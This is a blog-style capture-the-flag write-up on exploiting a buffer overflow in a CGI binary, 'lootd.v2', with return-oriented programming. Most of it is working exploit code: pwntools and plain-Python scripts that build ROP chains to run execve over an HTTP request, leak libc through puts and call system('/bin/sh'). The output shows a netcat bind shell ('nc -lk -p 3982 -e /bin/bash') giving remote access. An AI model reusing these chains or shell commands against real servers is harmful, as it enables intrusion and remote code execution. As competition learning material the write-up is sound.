Buffer Overflow and ROP


In December 2021 I took part in a CTF competition for the first time, at a friend's suggestion. It was set up and hosted by the Norwegian military intelligence service as part of their recruitment program. I ended up at #24 with 173 points, which I was fairly happy with as something of a beginner.

One of the challenges was to exploit vulnerable buffers in a GNU/Linux binary. I had not looked at exploiting buffer overflows since the early '00s. I found it funny that using assembly snippets had become an entire thing of its own called Return Oriented Programming (ROP), where the asm snippets are called gadgets.

Well, I'm posting a note of the ROP code I used to get a shell, both from a local binary and via CGI (to abuse its elevated user rights). Mainly just as a rough reference if I ever play around with CTFs again. It was an addictive rabbit hole... In this exact situation I had to exploit a binary via CGI. After getting local SSH access I created a script in the user folder, then overflowed the input to the CGI binary through a web request. The ROP chain writes the path of that script into the binary's writable .bss memory (flagged WRITE and ALLOC) and then runs it via execve. Before that, I practiced locally through the binary's standard input, using libc offsets to reach the existing /bin/sh string instead of writing my own. That version is also included below.

In-depth
ROP is just about setting up a chain of assembly snippets to achieve simple function calls, e.g. to spawn a shell. It is called "Return Oriented" because each snippet, found with tools like ROPgadget or any disassembler, ends in RET. The overflowed byte string places the addresses of the snippets on the stack, so every RET pops the next address from the stack into the instruction pointer, effectively executing the chain of commands.
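
To make the mechanics concrete, here is a toy simulation (not a real exploit) of how RET walks such a chain. The gadget addresses are the ones I list for lootd.v2 further down; the GADGETS table and the run_chain helper are hypothetical names made up for this sketch, and any address that is not in the table is simply treated as the final call target.

```python
import struct

# Hypothetical model: gadget address -> registers it pops before its RET.
GADGETS = {
    0x4027fb: ["rdi"],  # pop rdi ; ret
    0x40a4f0: ["rsi"],  # pop rsi ; ret
    0x403e03: ["rdx"],  # pop rdx ; ret
}

def run_chain(stack_bytes):
    """Walk a chain the way RET would and return the resulting registers."""
    words = struct.unpack("<%dQ" % (len(stack_bytes) // 8), stack_bytes)
    regs = {}
    sp = 0
    while sp < len(words):
        target = words[sp]          # RET pops the next address into RIP
        sp += 1
        regs["rip"] = target
        if target not in GADGETS:
            break                   # unknown address: treat it as the called function
        for reg in GADGETS[target]:
            regs[reg] = words[sp]   # each POP consumes the next stack value
            sp += 1
    return regs

# Same shape as the execve part of the CGI chain further down.
chain = struct.pack(
    "<7Q",
    0x4027fb, 0x40e1e8,  # rdi = pointer to the command string
    0x40a4f0, 0,         # rsi = NULL
    0x403e03, 0,         # rdx = NULL
    0x4010c0,            # execve via the PLT
)
regs = run_chain(chain)
print({name: hex(value) for name, value in regs.items()})
```

The point is only that the data on the stack decides both what gets executed next and which values end up in the registers.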

The whole trick with buffer overflows is to overwrite the saved return address that sits on the stack just past the memory allocated for the buffer, so that it points to code that does what you want. The instruction pointer then runs that code instead of hitting a segmentation fault on bogus overflowed data. It doesn't matter what was there before, since essentially you're taking over. In the old days you could put your own executable code in the buffer itself, but today's default stack protections (a non-executable stack) prevent that. That's the reason ROP originated in the first place: it reuses executable code that's already accessible in the binary itself.
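
A small model of that stack frame, as a sketch only. The 136 bytes of filler match what I used for the stdin payloads below, but splitting them into a 128 byte buffer plus 8 bytes of saved RBP is an assumption for illustration, and make_frame, unchecked_copy and saved_return are hypothetical helper names.

```python
import struct

BUF_SIZE = 128                      # assumed buffer size, for illustration only
SAVED_RBP = 8                       # assumed saved frame pointer
RET_OFFSET = BUF_SIZE + SAVED_RBP   # 136 bytes of filler before the return address

def make_frame(return_address):
    """Buffer + saved RBP + saved return address, as one flat byte array."""
    frame = bytearray(RET_OFFSET + 8)
    struct.pack_into("<Q", frame, RET_OFFSET, return_address)
    return frame

def unchecked_copy(frame, data):
    """Model of a copy without a length check: writes from the buffer start."""
    frame[0:len(data)] = data

def saved_return(frame):
    return struct.unpack_from("<Q", frame, RET_OFFSET)[0]

frame = make_frame(0x401c7a)        # legitimate return address
unchecked_copy(frame, b"A" * 100)   # fits in the buffer, nothing happens
before = saved_return(frame)

# Too much input: the 8 bytes after the filler replace the return address.
unchecked_copy(frame, b"A" * RET_OFFSET + struct.pack("<Q", 0x4027fb))
after = saved_return(frame)
print(hex(before), hex(after))
```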

The calling convention differs between x86 and x64, e.g. in how function parameters are passed; google as needed. I've coded for x64.
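
On x64 Linux the first three integer arguments go in RDI, RSI and RDX, whereas 32-bit x86 code typically passes them on the stack. A minimal sketch of what that means for a chain: one "pop reg ; ret" gadget per argument, then the function address. The gadget addresses are the ones from lootd.v2 used below; call_chain and the local p64 are hypothetical helpers written with struct so the snippet runs without pwntools.

```python
import struct

def p64(value):
    """Pack a 64-bit little-endian value (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)

# One gadget per argument register, in x64 argument order.
ARG_GADGETS = [
    0x4027fb,  # pop rdi ; ret  (argument 1)
    0x40a4f0,  # pop rsi ; ret  (argument 2)
    0x403e03,  # pop rdx ; ret  (argument 3)
]

def call_chain(func_addr, *args):
    """Build the chain for func(args...) with up to three arguments."""
    if len(args) > len(ARG_GADGETS):
        raise ValueError("this sketch only handles three arguments")
    chain = b""
    for gadget, value in zip(ARG_GADGETS, args):
        chain += p64(gadget) + p64(value)
    return chain + p64(func_addr)

# execve(command, NULL, NULL) through the PLT entry at 0x4010c0.
execve_chain = call_chain(0x4010c0, 0x40e1e8, 0, 0)
print(execve_chain.hex())
```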

Via CGI. I did not find the necessary string(s) in the binary, so I used available writable .bss memory to hold the command for execve. A writable memory address can be found with GDB (maintenance info sections) and/or readelf (-S). The code below uses the Python library pwn from pwntools.
from pwn import *
import time
import urllib.parse

# Connection.
r = remote('anvilshop.utl', 80)

# Gadgets in lootd.v2. Some are left unused for testing and reference.
POP_RDI = p64(0x4027fb) # pop rdi ; ret - This should hold the pointer to '/bin/sh'
POP_RSI = p64(0x40a4f0) # pop rsi ; ret - Not important, can be 0
POP_RDX = p64(0x403e03) # pop rdx ; ret - Not important, can be 0
POP_RAX = p64(0x401001) # pop rax ; ret - This should be 0x3b
POP_RBX = p64(0x401518) # pop rbx ; ret
PUTS_PLT = p64(0x4010d0) # Used for the puts call.
PUTS_GOT = p64(0x40e070) # Used as the puts argument.
MAIN_ = p64(0x401c7a) # To return to main after the puts detour.
MAIN_CLI_ = p64(0x401c6a) # When jumping to cli_handler to handle the signal.
RET_ = p64(0x401002) # See if it helps to align the stack on anvil.
EXIT_ = p64(0x401260) # testing.
STR_ = p64(0x40df92) # Random string I can use for testing: "cgi_token_ok".
PRINT_F = p64(0x401050)
PRINT_F_FORMAT_STRING = p64(0x400000 + 0xb028)
CGI_DONE = p64(0x401e3e)
MOVELOOT_STR = p64(0x400000 + 0xb045)
SPAWN = p64(0x40a279)
SPAWN_ARG2 = p64(0x400000 + 0xb38c) # ABC=def
HTTP_AUTHORIZATION = p64(0x400000 + 0xb33d) # b33d HTTP_AUTHORIZATION
ENV_GET = p64(0x401ca6)
WRITE = p64(0x40a3d3) # mov dword ptr [rax + 8], edx ; mov eax, 0 ; pop rbx ; ret
EXECVE = p64(0x4010c0)
WRITE_MEM = 0x40e1e0 # .bss, test writing a string here.
EDX_PAD = b'\x00\x00\x00\x00' # Since edx only uses the 4 lowest bytes.


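# Shellcode (the ROP chain).
p = b"A" * 168
p += RET_   # 16-byte alignment. RSP ended in 8 otherwise.

# Write the reverse shell command to writable memory.
# The WRITE gadget stores at [rax + 8], so the string ends up at WRITE_MEM + 8: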
p += POP_RAX
p += p64(WRITE_MEM)
p += POP_RDX
p += b'/hom' + EDX_PAD
p += WRITE
p += p64(0)

p += POP_RAX
p += p64(WRITE_MEM + 4)
p += POP_RDX
p += b'e/us' + EDX_PAD
p += WRITE
p += p64(0)

p += POP_RAX
p += p64(WRITE_MEM + 4*2)
p += POP_RDX
p += b'er/d' + EDX_PAD
p += WRITE
p += p64(0)

p += POP_RAX
p += p64(WRITE_MEM + 4*3)
p += POP_RDX
p += b'jsh\x00' + EDX_PAD
p += WRITE
p += p64(0)


# Run the command with execve.
# TESTED OK - uid=100(apache) gid=101(apache) groups=82(www-data),101(apache),101(apache)
p += POP_RDX
p += p64(0)
p += POP_RSI
p += p64(0)
p += POP_RDI
p += p64(WRITE_MEM + 8)
p += EXECVE
p += EXIT_

# GET request.
payload1 = b"GET /cgi-bin/lootd.v2/download?" + urllib.parse.quote_from_bytes(p).encode() +b" HTTP/1.1\r\n" \
           b"Host: anvilshop.utl\r\n" \
           b"Content-Type: text/html; charset=utf-8\r\n" \
           b"User-Agent: cgi_shell/1.0\r\n" \
           b"Authorization: thronic\r\n" \
           b"Accept: */*\r\n\r\n"

r.send(payload1)
time.sleep(1)
log.info(r.recv().decode('utf-8'))
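
The four hand-written write blocks above all follow the same pattern, so they could be generated. A rough sketch, assuming the same gadgets as in the script: write_string_chain and the local p64 are hypothetical helpers (struct is used so it runs without pwntools). Since the WRITE gadget stores at [rax + 8], the string lands 8 bytes past the address given in RAX.

```python
import struct

def p64(value):
    """Pack a 64-bit little-endian value (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)

POP_RAX = 0x401001    # pop rax ; ret
POP_RDX = 0x403e03    # pop rdx ; ret
WRITE = 0x40a3d3      # mov dword ptr [rax + 8], edx ; mov eax, 0 ; pop rbx ; ret
WRITE_MEM = 0x40e1e0  # writable .bss address

def write_string_chain(base, text):
    """Chain that writes text plus a NUL terminator, 4 bytes at a time."""
    data = text + b"\x00"
    data += b"\x00" * (-len(data) % 4)      # pad to a multiple of 4 bytes
    chain = b""
    for offset in range(0, len(data), 4):
        chain += p64(POP_RAX) + p64(base + offset)
        # Only edx (the low 4 bytes of rdx) is written, so pad to 8 bytes.
        chain += p64(POP_RDX) + data[offset:offset + 4].ljust(8, b"\x00")
        chain += p64(WRITE) + p64(0)        # the 0 feeds the gadget's pop rbx
    return chain

write_chain = write_string_chain(WRITE_MEM, b"/home/user/djsh")
string_address = WRITE_MEM + 8              # where execve has to point
print(len(write_chain), hex(string_address))
```

For the 15 character path this produces the same four blocks as the manual version, and a longer command only changes the argument.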


Via stdin input. Still using pwn from pwntools. Instead of writing my own command, here I leak a libc address and use offsets from it instead.
from pwn import *
import time

# Process setup.
context.arch = 'amd64'
context.os = 'linux'
#s = remote('anvilshop.utl',3982)
s = process('./lootd.v2')

#
#   Prepare ASM "gadget" offsets in the program itself that I can use.
#
POP_RDI = p64(0x4027fb) # pop rdi ; ret - This should hold the pointer to '/bin/sh'
POP_RSI = p64(0x40a4f0) # pop rsi ; ret - Not important, can be 0
POP_RDX = p64(0x403e03) # pop rdx ; ret - Not important, can be 0
POP_RAX = p64(0x401001) # pop rax ; ret - This should be 0x3b
POP_RBX = p64(0x401518) # pop rbx ; ret
PUTS_PLT = p64(0x4010d0) # Used for the puts call.
PUTS_GOT = p64(0x40e070) # Used as the puts argument.
MAIN_ = p64(0x401c7a) # To return to main after the puts detour.
MAIN_CLI_ = p64(0x401c6a) # When jumping to cli_handler to handle the signal.
MAIN_ALT_ = p64(0x401c91)
RET_ = p64(0x401002) # See if it helps to align the stack on anvil.
EXIT_ = p64(0x401260) # testing.
START_ = p64(0x40b0dc) # testing.
STR_ = p64(0x40df92) # Random string I can use for testing: "cgi_token_ok".
SIGNAL_ = p64(0x401160)

#
#   Prepare payload to leak a libc address.
#
p = b'A' * 136  # Junk to fill the buffer.
p += POP_RDI    # Pops the next stack value into RDI (first parameter in 64-bit ASM).
p += PUTS_GOT   # GOT address of puts (found via objdump -D), consumed by POP RDI; RET.
p += PUTS_PLT   # Calls puts via the PLT so it prints its runtime address.
p += MAIN_

#log.info("Command for the first ROP chain that can be used for testing:")
#log.info("echo '"+ p.hex() +"' | xxd -r -p | ./lootd.v2")
log.info("Saving payload in payload_dump")
with open("payload_dump","wb") as payload_dump:
    payload_dump.write(p)

# Anvil needs to be "woken up" a bit.
s.sendline(b'AAAAAAAA')
s.recvuntil(b'\n> ')

# Send the payload and fetch the puts libc address I can calculate the base from.
s.sendline(p)
received_raw = s.recv(timeout=1)
received_bytes = received_raw.split(b"\n")[1].rstrip(b'\n> ').ljust(8,b'\x00')
log.info("Leaked puts address: "+ hex(u64(received_bytes)))
#log.info("Based on: "+ str(received_raw))

#
#   Details derived from the leak above (ANVILSHOP'S LIBC).
#
#LIBC_SYSTEM = 0x3f716
#LIBC_BIN_SH = 0x91a62
#LIBC_SYSCALL = 0x16170
#LIBC_PUTS = 0x4a939
#LIBC_BASE = u64(received_bytes) - LIBC_PUTS
#log.info("Calculated libc base: "+ hex(LIBC_BASE))

#
#   Details derived from the leak above (LOCAL LIBC).
#
LIBC_SYSTEM = 0x4fce0
LIBC_BIN_SH = 0xb01d7
LIBC_SYSCALL = 0x15a2e
LIBC_PUTS = 0x5fb40
LIBC_BASE = u64(received_bytes) - LIBC_PUTS
log.info("Calculated libc base: "+ hex(LIBC_BASE))

#
#   Data needed from libc now that I have the libc base.
#
BIN_SH = p64(LIBC_BASE + LIBC_BIN_SH)
SYSCALL = p64(LIBC_BASE + LIBC_SYSCALL)
SYSTEM_ = p64(LIBC_BASE + LIBC_SYSTEM)

#
#   Prepare payload for system (the execve syscall variant is left commented out).
#
p = b'A' * 136	# Filler for the buffer.
#p += POP_RAX	# 0x3b for syscall.
#p += p64(0x3b)
p += POP_RDI	# "/bin/sh"
p += BIN_SH
#p += POP_RSI	# Args 2 and 3 set to NULL.
#p += p64(0)
#p += POP_RDX
#p += p64(0)
#p += SYSCALL	# Should trigger EXECVE.
p += SYSTEM_

# Send to the process.
s.sendline(p)
#s.recvuntil(b'\n')

# Go interactive with the new shell.
s.interactive()
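
The libc arithmetic in the script above, pulled out as a standalone sketch. The offsets are the local libc values from the script; resolve_libc is a hypothetical helper name, and the example leak is a made-up address, not one I actually observed. The page alignment check is an extra sanity test I did not have in the original: if the base does not end in 000, the offsets most likely belong to a different libc.

```python
import struct

# Offsets inside my local libc, as used in the script above.
LIBC_PUTS = 0x5fb40
LIBC_SYSTEM = 0x4fce0
LIBC_BIN_SH = 0xb01d7

def resolve_libc(leaked_bytes):
    """Turn the raw bytes printed by puts(puts@GOT) into runtime addresses."""
    # puts stops at the first NUL byte, so pad the leak back to 8 bytes.
    leak = struct.unpack("<Q", leaked_bytes.ljust(8, b"\x00"))[0]
    base = leak - LIBC_PUTS
    if base & 0xfff:
        raise ValueError("libc base is not page aligned, wrong offsets?")
    return {
        "base": base,
        "system": base + LIBC_SYSTEM,
        "bin_sh": base + LIBC_BIN_SH,
    }

# Made-up leak for demonstration: a hypothetical base plus the puts offset.
example_base = 0x7ffff7dc0000
example_leak = struct.pack("<Q", example_base + LIBC_PUTS).rstrip(b"\x00")
addresses = resolve_libc(example_leak)
print({name: hex(value) for name, value in addresses.items()})
```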


Still via stdin, but without pwntools.
I wanted to try my own interactive solution with native Python.

from struct import *
import os
import subprocess
import time

# Process setup.
process = subprocess.Popen(['./lootd.v2'],
        shell=True,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        bufsize=0)

# Global variables.
have_sent_payload_1 = False
have_sent_payload_2 = False
received_data_bytes = b''
libcaddr_bytes = b''
LIBC_BASE = 0x0

# ASM instructions / "gadgets".
POP_RDI = pack("Q",0x4027fb) # pop rdi ; ret - This should hold the pointer to '/bin/sh'
PUTS_PLT = pack("Q",0x4010d0) # Used for the puts call.
PUTS_GOT = pack("Q",0x40e070) # Used as the puts argument.
MAIN_ = pack("Q",0x401c7a) # To return to main after the puts detour.

# Offsets.
LIBC_SYSTEM = 0x4fce0
LIBC_BIN_SH = 0xb01d7
LIBC_PUTS = 0x5fb40

def send_payload_1():
        #
        #   Prepare payload to leak a libc address.
        #
        p = b'A' * 136  # Junk to fill the buffer.
        p += POP_RDI    # Pops the next stack value into RDI (first parameter in 64-bit ASM).
        p += PUTS_GOT   # GOT address of puts (found via objdump -D), consumed by POP RDI; RET.
        p += PUTS_PLT   # Calls puts via the PLT so it prints its runtime address.
        p += MAIN_

        # Anvil needs to be woken up a bit.
        received_raw = os.read(process.stdout.fileno(), 4096)
        os.write(process.stdin.fileno(), b'AAAAAAAA\n')
        received_raw = os.read(process.stdout.fileno(), 4096)

        # Send the payload and fetch the puts libc address I can calculate the base from.
        os.write(process.stdin.fileno(), p)
        os.write(process.stdin.fileno(), b'\n')
        received_raw = os.read(process.stdout.fileno(), 4096)
        print("Leaked data: "+ str(received_raw))
        received_bytes = received_raw.split(b"\n")[1].rstrip(b'\n> ').ljust(8,b'\x00')
        print("Leaked puts address: "+ hex(unpack("Q",received_bytes)[0]))

        #
        #   Calculate the libc base from the leak above (using the local libc offsets).
        #
        LIBC_BASE = unpack("Q",received_bytes)[0] - LIBC_PUTS
        print("Calculated libc base: "+ hex(LIBC_BASE))

        return LIBC_BASE


def send_payload_2():
        #
        #   Data needed from libc now that I have the libc base.
        #
        BIN_SH = pack("Q",LIBC_BASE + LIBC_BIN_SH)
        SYSTEM_ = pack("Q",LIBC_BASE + LIBC_SYSTEM)

        #
        #   Prepare payload for system.
        #
        p = b'A' * 136  # Filler for the buffer.
        p += POP_RDI    # "/bin/sh"
        p += BIN_SH
        p += SYSTEM_

        # Send to the process.
        os.write(process.stdin.fileno(), p)
        os.write(process.stdin.fileno(), b'\n')

while True:
        if have_sent_payload_1 == False:
                LIBC_BASE = send_payload_1()
                have_sent_payload_1 = True
                continue

        if have_sent_payload_1 == True and LIBC_BASE != 0x0 and have_sent_payload_2 == False:
                send_payload_2()
                have_sent_payload_2 = True
                continue

        if have_sent_payload_1 == True and have_sent_payload_2 == True:
                #received_bytes = os.read(process.stdout.fileno(), 4096)
                #print(received_bytes.decode('utf-8'))
                shell_input = input("djshell> ")
                os.write(process.stdin.fileno(), shell_input.encode('utf-8') + b'\n')
                time.sleep(1)
                received_bytes = os.read(process.stdout.fileno(), 4096)
                print(received_bytes.decode('utf-8'))
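
The fixed time.sleep(1) before each read in the loop above either waits longer than needed or returns before a slow command has printed anything. One possible alternative, sketched here under the assumption of a POSIX system where select works on pipes: read_available is a hypothetical helper, not something the script above uses.

```python
import os
import select

def read_available(fd, timeout=0.5):
    """Read whatever arrives on fd until it stays quiet for `timeout` seconds."""
    chunks = []
    # select returns the fd as readable when data (or end of file) is pending.
    while select.select([fd], [], [], timeout)[0]:
        data = os.read(fd, 4096)
        if not data:        # empty read means the other side closed the pipe
            break
        chunks.append(data)
    return b"".join(chunks)
```

In the interactive loop this would replace the sleep and the single os.read, e.g. print(read_available(process.stdout.fileno()).decode('utf-8')).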


Aftermath (Via CGI).
user@anvilshop ~ > ps aux
PID   USER     TIME  COMMAND
  409 apache    0:00 {djsh} /bin/sh /home/user/djsh
  410 apache    0:00 nc -lk -p 3982 -e /bin/bash --noprofile
  413 apache    0:00 /bin/bash --noprofile

login@corax:~/2_oppdrag$ nc anvilshop.utl 3982
id
uid=100(apache) gid=101(apache) groups=82(www-data),101(apache),101(apache)
ls
FLAG_YOU_CANNOT_LFI
cat FLAG_YOU_CANNOT_LFI
245c4e7f65bde45cf55710ef6da1f2c3


Original Post: Feb 17th, '22 13:30 CET.
Updated: Sep 22nd, '22 10:48 CEST.

Tags: Python